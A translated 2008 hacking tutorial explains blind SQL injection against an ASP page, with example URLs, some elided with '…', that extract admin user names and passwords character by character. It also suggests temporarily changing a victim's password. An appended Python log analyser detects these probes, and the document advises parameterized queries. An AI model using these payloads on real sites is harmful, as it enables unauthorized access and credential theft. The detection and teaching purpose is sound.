A hacker teaches you what an SQL injection attack is (8)
  Add date: 07/16/2008   Publishing date: 07/16/2008

Guessing the user name and the password
The most commonly used and most effective methods for guessing the content of the user name and the password include:
ASCII character-by-character decoding: this method is slow, but it is always feasible. The basic idea is to first determine the length of the field and then determine each character value in turn. The user name and the password are guessed in the same way; the following example, which guesses the user name, shows the process.
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top… from TestDB.dbo.admin) =X (X=1,2,3,4,5,… n; username is the name of the user name field, admin is the table name). If abc.asp runs normally when X is some value i, then i is the length of the first user name. For example, when the input is
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top… e) from TestDB.dbo.admin) =8 and abc.asp runs normally, the length of the first user name is 8.
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (sel… ascii(substring(username, m,1)) from TestDB.dbo.admin) =n (m takes values from 1 up to the user name length obtained in the previous step; m=1,2,3,… guesses the 1st, 2nd, 3rd,… character in turn. n is the ASCII value of 1~9, a~z, A~Z, that is, any value between 1 and 128. admin is the name of the system user account table). If abc.asp runs normally when n is some value i, then the character whose ASCII code is i is the character at that position of the user name. For example, when the input is
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (sel… ascii(substring(username,3,1)) from TestDB.dbo.admin) =80 and abc.asp runs normally, the third character of the user name is P (the ASCII code of P is 80);
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (sel… ascii(substring(username,9,1)) from TestDB.dbo.admin) =33 and abc.asp runs normally, the 9th character of the user name is ! (the ASCII code of ! is 33);
Once the first user name and password have been guessed, all the other user names and passwords can be guessed in the same way. Note: sometimes the password obtained has been processed with MD5 or a similar scheme, and a special-purpose tool is then needed to decode it. Alternatively, change the password first and change it back after use; see the explanation below.
Simple method: to guess the user name, use
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top 1… o.admin where username>1). Here flag is a field in the admin table and username is the user name field. This time abc.asp does not run normally, but the username value can be obtained. In a similar way, the second user, the third user and so on can be obtained, until all users in the table are known.
To guess the user password: HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top 1… B.dbo.admin where pwd>1). Here flag is a field in the admin table and pwd is the password field. This time abc.asp does not run normally, but the pwd value can be obtained. In a similar way, the second user's password, the third user's password and so on can be obtained, until all the passwords in the table are known. Sometimes the password has been MD5-encrypted, in which case the password may be changed instead.
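Seen from the defender's side, the character-by-character guessing described above leaves a recognisable trail in web server logs: one client sends many requests in which the numeric p parameter carries ascii(substring(...)) at successive positions. The Python sketch below is an added example, not part of the original article; the log lines are constructed, and the function name analyse, the parameter name p and the threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Character probe as described in the article: ascii(substring(<col>, <pos>, 1))
CHAR_PROBE = re.compile(
    r"ascii\s*\(\s*substring\s*\(\s*(\w+)\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)", re.I)
# SQL keywords have no business inside a parameter that should be a bare integer
SQL_IN_ID = re.compile(r"\b(select|and|or|where|from)\b", re.I)

# Constructed sample log entries (client address, request URL); not real traffic.
SAMPLE_LOG = [
    ("192.0.2.10", "/abc.asp?p=12"),
    ("192.0.2.44", "/abc.asp?p=12%20and%20(select%20top%201%20ascii(substring(username,1,1))%20from%20TestDB.dbo.admin)=79"),
    ("192.0.2.44", "/abc.asp?p=12%20and%20(select%20top%201%20ascii(substring(username,2,1))%20from%20TestDB.dbo.admin)=80"),
    ("192.0.2.44", "/abc.asp?p=12%20and%20(select%20top%201%20ascii(substring(username,3,1))%20from%20TestDB.dbo.admin)=80"),
    ("192.0.2.77", "/abc.asp?p=12%20and%201=1"),
]

def analyse(log, param="p", min_positions=3):
    """Return {client: finding} for clients whose `param` values contain SQL."""
    positions = defaultdict(set)   # client -> substring positions probed
    tampered = defaultdict(int)    # client -> requests with SQL in the id
    for client, url in log:
        # parse_qs URL-decodes the value, so %20 and + obfuscation is removed
        for value in parse_qs(urlsplit(url).query).get(param, []):
            if value.strip().isdigit():
                continue           # legitimate request: id is a bare integer
            probes = CHAR_PROBE.findall(value)
            if probes or SQL_IN_ID.search(value):
                tampered[client] += 1
            for _column, pos in probes:
                positions[client].add(int(pos))
    findings = {}
    for client, count in tampered.items():
        probed = sorted(positions[client])
        kind = ("char-by-char enumeration" if len(probed) >= min_positions
                else "sql in numeric parameter")
        findings[client] = {"requests": count, "positions": probed, "kind": kind}
    return findings

if __name__ == "__main__":
    for client, finding in analyse(SAMPLE_LOG).items():
        print(client, finding)
```

The same integer check used here to skip legitimate requests (the value must consist of digits only) is what abc.asp should enforce on p before it builds any query, together with a parameterized statement.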

 